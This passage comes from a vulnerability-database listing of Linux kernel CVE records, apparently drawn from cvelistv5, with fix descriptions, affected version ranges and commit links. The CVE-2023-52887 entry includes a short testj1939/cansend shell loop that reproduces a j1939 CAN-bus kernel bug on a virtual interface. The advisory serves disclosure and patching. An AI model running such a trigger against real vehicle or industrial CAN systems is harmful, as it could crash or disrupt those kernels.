"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.284",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.226",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "2.6.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: initialize integrity buffer to zero before writing it to media\n\nMetadata added by bio_integrity_prep is using plain kmalloc, which leads\nto random kernel memory being written media. For PI metadata this is\nlimited to the app tag that isn\u0027t used by kernel generated metadata,\nbut for non-PI metadata the entire buffer leaks kernel memory.\n\nFix this by adding the __GFP_ZERO flag to allocations for writes."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:45.701Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9f4af4cf08f9a0329ade3d938f55d2220c40d0a6"
},
{
"url": "https://git.kernel.org/stable/c/129f95948a96105c1fad8e612c9097763e88ac5f"
},
{
"url": "https://git.kernel.org/stable/c/3fd11fe4f20756b4c0847f755a64cd96f8c6a005"
},
{
"url": "https://git.kernel.org/stable/c/cf6b45ea7a8df0f61bded1dc4a8561ac6ad143d2"
},
{
"url": "https://git.kernel.org/stable/c/d418313bd8f55c079a7da12651951b489a638ac1"
},
{
"url": "https://git.kernel.org/stable/c/23a19655fb56f241e592041156dfb1c6d04da644"
},
{
"url": "https://git.kernel.org/stable/c/ebc0e91ba76dc6544fff9f5b66408b1982806a00"
},
{
"url": "https://git.kernel.org/stable/c/899ee2c3829c5ac14bfc7d3c4a5846c0b709b78f"
}
],
"title": "block: initialize integrity buffer to zero before writing it to media",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43854",
"datePublished": "2024-08-17T09:22:11.297Z",
"dateReserved": "2024-08-17T09:11:59.278Z",
"dateUpdated": "2025-05-04T09:27:45.701Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43858 (GCVE-0-2024-43858)
Vulnerability from cvelistv5
Published
2024-08-17 09:24
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jfs: Fix array-index-out-of-bounds in diFree
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43858",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:07:01.781226Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:20.278Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_imap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "55b732c8b09b41148eaab2fa8e31b0af47671e00",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9b3a4345957f5372041bc4f59de322f62653e862",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "538a27c8048f081a5ddd286f886eb986fbbc7f80",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "63f7fdf733add82f126ea00e2e48f6eba15ac4b9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8d8f9a477de0d7962342eedf2a599215b7c63d28",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ff14eadc278663cac69d57d3ca7fb2f394e1f8a7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6aa6892a90a5a7fabffe5692ab9f06a7a46c6e42",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f73f969b2eb39ad8056f6c7f3a295fa2f85e313a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_imap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: Fix array-index-out-of-bounds in diFree"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:50.783Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/55b732c8b09b41148eaab2fa8e31b0af47671e00"
},
{
"url": "https://git.kernel.org/stable/c/9b3a4345957f5372041bc4f59de322f62653e862"
},
{
"url": "https://git.kernel.org/stable/c/538a27c8048f081a5ddd286f886eb986fbbc7f80"
},
{
"url": "https://git.kernel.org/stable/c/63f7fdf733add82f126ea00e2e48f6eba15ac4b9"
},
{
"url": "https://git.kernel.org/stable/c/8d8f9a477de0d7962342eedf2a599215b7c63d28"
},
{
"url": "https://git.kernel.org/stable/c/ff14eadc278663cac69d57d3ca7fb2f394e1f8a7"
},
{
"url": "https://git.kernel.org/stable/c/6aa6892a90a5a7fabffe5692ab9f06a7a46c6e42"
},
{
"url": "https://git.kernel.org/stable/c/f73f969b2eb39ad8056f6c7f3a295fa2f85e313a"
}
],
"title": "jfs: Fix array-index-out-of-bounds in diFree",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43858",
"datePublished": "2024-08-17T09:24:27.976Z",
"dateReserved": "2024-08-17T09:11:59.279Z",
"dateUpdated": "2025-05-04T09:27:50.783Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41045 (GCVE-0-2024-41045)
Vulnerability from cvelistv5
Published
2024-07-29 14:32
Modified
2025-05-04 09:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Defer work in bpf_timer_cancel_and_free
Currently, the same case as previous patch (two timer callbacks trying
to cancel each other) can be invoked through bpf_map_update_elem as
well, or more precisely, freeing map elements containing timers. Since
this relies on hrtimer_cancel as well, it is prone to the same deadlock
situation as the previous patch.
It would be sufficient to use hrtimer_try_to_cancel to fix this problem,
as the timer cannot be enqueued after async_cancel_and_free. Once
async_cancel_and_free has been done, the timer must be reinitialized
before it can be armed again. The callback running in parallel trying to
arm the timer will fail, and freeing bpf_hrtimer without waiting is
sufficient (given kfree_rcu), and bpf_timer_cb will return
HRTIMER_NORESTART, preventing the timer from being rearmed again.
However, there exists a UAF scenario where the callback arms the timer
before entering this function, such that if cancellation fails (due to
timer callback invoking this routine, or the target timer callback
running concurrently). In such a case, if the timer expiration is
significantly far in the future, the RCU grace period expiration
happening before it will free the bpf_hrtimer state and along with it
the struct hrtimer, that is enqueued.
Hence, it is clear cancellation needs to occur after
async_cancel_and_free, and yet it cannot be done inline due to deadlock
issues. We thus modify bpf_timer_cancel_and_free to defer work to the
global workqueue, adding a work_struct alongside rcu_head (both used at
_different_ points of time, so can share space).
Update existing code comments to reflect the new state of affairs.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:51.645Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7aa5a19279c3639ae8b758b63f05d0c616a39fa1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6fcd19d7eac1335eb76bc16b6a66b7f574d1d69"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41045",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:23:00.726132Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:02.451Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/helpers.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7aa5a19279c3639ae8b758b63f05d0c616a39fa1",
"status": "affected",
"version": "b00628b1c7d595ae5b544e059c27b1f5828314b4",
"versionType": "git"
},
{
"lessThan": "a6fcd19d7eac1335eb76bc16b6a66b7f574d1d69",
"status": "affected",
"version": "b00628b1c7d595ae5b544e059c27b1f5828314b4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/helpers.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Defer work in bpf_timer_cancel_and_free\n\nCurrently, the same case as previous patch (two timer callbacks trying\nto cancel each other) can be invoked through bpf_map_update_elem as\nwell, or more precisely, freeing map elements containing timers. Since\nthis relies on hrtimer_cancel as well, it is prone to the same deadlock\nsituation as the previous patch.\n\nIt would be sufficient to use hrtimer_try_to_cancel to fix this problem,\nas the timer cannot be enqueued after async_cancel_and_free. Once\nasync_cancel_and_free has been done, the timer must be reinitialized\nbefore it can be armed again. The callback running in parallel trying to\narm the timer will fail, and freeing bpf_hrtimer without waiting is\nsufficient (given kfree_rcu), and bpf_timer_cb will return\nHRTIMER_NORESTART, preventing the timer from being rearmed again.\n\nHowever, there exists a UAF scenario where the callback arms the timer\nbefore entering this function, such that if cancellation fails (due to\ntimer callback invoking this routine, or the target timer callback\nrunning concurrently). In such a case, if the timer expiration is\nsignificantly far in the future, the RCU grace period expiration\nhappening before it will free the bpf_hrtimer state and along with it\nthe struct hrtimer, that is enqueued.\n\nHence, it is clear cancellation needs to occur after\nasync_cancel_and_free, and yet it cannot be done inline due to deadlock\nissues. We thus modify bpf_timer_cancel_and_free to defer work to the\nglobal workqueue, adding a work_struct alongside rcu_head (both used at\n_different_ points of time, so can share space).\n\nUpdate existing code comments to reflect the new state of affairs."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:20:51.175Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7aa5a19279c3639ae8b758b63f05d0c616a39fa1"
},
{
"url": "https://git.kernel.org/stable/c/a6fcd19d7eac1335eb76bc16b6a66b7f574d1d69"
}
],
"title": "bpf: Defer work in bpf_timer_cancel_and_free",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41045",
"datePublished": "2024-07-29T14:32:02.866Z",
"dateReserved": "2024-07-12T12:17:45.624Z",
"dateUpdated": "2025-05-04T09:20:51.175Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52887 (GCVE-0-2023-52887)
Vulnerability from cvelistv5
Published
2024-07-29 15:52
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: can: j1939: enhanced error handling for tightly received RTS messages in xtp_rx_rts_session_new
This patch enhances error handling in scenarios with RTS (Request to
Send) messages arriving closely. It replaces the less informative WARN_ON_ONCE
backtraces with a new error handling method. This provides clearer error
messages and allows for the early termination of problematic sessions.
Previously, sessions were only released at the end of j1939_xtp_rx_rts().
Potentially this could be reproduced with something like:
testj1939 -r vcan0:0x80 &
while true; do
# send first RTS
cansend vcan0 18EC8090#1014000303002301;
# send second RTS
cansend vcan0 18EC8090#1014000303002301;
# send abort
cansend vcan0 18EC8090#ff00000000002301;
done
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:18:41.317Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed581989d7ea9df6f8646beba2341e32cd49a1f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6c839e717901dbd6b1c1ca807b6210222eb70f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1762ca80c2b72dd1b5821c5e347713ae696276ea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/26b18dd30e63d4fd777be429148e8e4ed66f60b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/177e33b655d35d72866b50aec84307119dc5f3d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0bc0a7416ea73f79f915c9a05ac0858dff65cfed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d3e2904f71ea0fe7eaff1d68a2b0363c888ea0fb"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52887",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:12.491125Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:08.617Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/can/j1939/transport.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ed581989d7ea9df6f8646beba2341e32cd49a1f9",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "f6c839e717901dbd6b1c1ca807b6210222eb70f6",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "1762ca80c2b72dd1b5821c5e347713ae696276ea",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "26b18dd30e63d4fd777be429148e8e4ed66f60b2",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "177e33b655d35d72866b50aec84307119dc5f3d4",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "0bc0a7416ea73f79f915c9a05ac0858dff65cfed",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "d3e2904f71ea0fe7eaff1d68a2b0363c888ea0fb",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/can/j1939/transport.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: enhanced error handling for tightly received RTS messages in xtp_rx_rts_session_new\n\nThis patch enhances error handling in scenarios with RTS (Request to\nSend) messages arriving closely. It replaces the less informative WARN_ON_ONCE\nbacktraces with a new error handling method. This provides clearer error\nmessages and allows for the early termination of problematic sessions.\nPreviously, sessions were only released at the end of j1939_xtp_rx_rts().\n\nPotentially this could be reproduced with something like:\ntestj1939 -r vcan0:0x80 \u0026\nwhile true; do\n\t# send first RTS\n\tcansend vcan0 18EC8090#1014000303002301;\n\t# send second RTS\n\tcansend vcan0 18EC8090#1014000303002301;\n\t# send abort\n\tcansend vcan0 18EC8090#ff00000000002301;\ndone"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:21.979Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ed581989d7ea9df6f8646beba2341e32cd49a1f9"
},
{
"url": "https://git.kernel.org/stable/c/f6c839e717901dbd6b1c1ca807b6210222eb70f6"
},
{
"url": "https://git.kernel.org/stable/c/1762ca80c2b72dd1b5821c5e347713ae696276ea"
},
{
"url": "https://git.kernel.org/stable/c/26b18dd30e63d4fd777be429148e8e4ed66f60b2"
},
{
"url": "https://git.kernel.org/stable/c/177e33b655d35d72866b50aec84307119dc5f3d4"
},
{
"url": "https://git.kernel.org/stable/c/0bc0a7416ea73f79f915c9a05ac0858dff65cfed"
},
{
"url": "https://git.kernel.org/stable/c/d3e2904f71ea0fe7eaff1d68a2b0363c888ea0fb"
}
],
"title": "net: can: j1939: enhanced error handling for tightly received RTS messages in xtp_rx_rts_session_new",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52887",
"datePublished": "2024-07-29T15:52:27.615Z",
"dateReserved": "2024-05-21T15:35:00.782Z",
"dateUpdated": "2025-05-04T07:45:21.979Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48881 (GCVE-0-2022-48881)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
platform/x86/amd: Fix refcount leak in amd_pmc_probe
pci_get_domain_bus_and_slot() takes reference, the caller should release
the reference by calling pci_dev_put() after use. Call pci_dev_put() in
the error path to fix this.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48881",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:56.421586Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:52.819Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/platform/x86/amd/pmc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3944162821295993ec89992dec98ab6be6306cc0",
"status": "affected",
"version": "3d7d407dfb05b257e15cb0c6b056428a4a8c2e5d",
"versionType": "git"
},
{
"lessThan": "ccb32e2be14271a60e9ba89c6d5660cc9998773c",
"status": "affected",
"version": "3d7d407dfb05b257e15cb0c6b056428a4a8c2e5d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/platform/x86/amd/pmc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.18"
},
{
"lessThan": "5.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
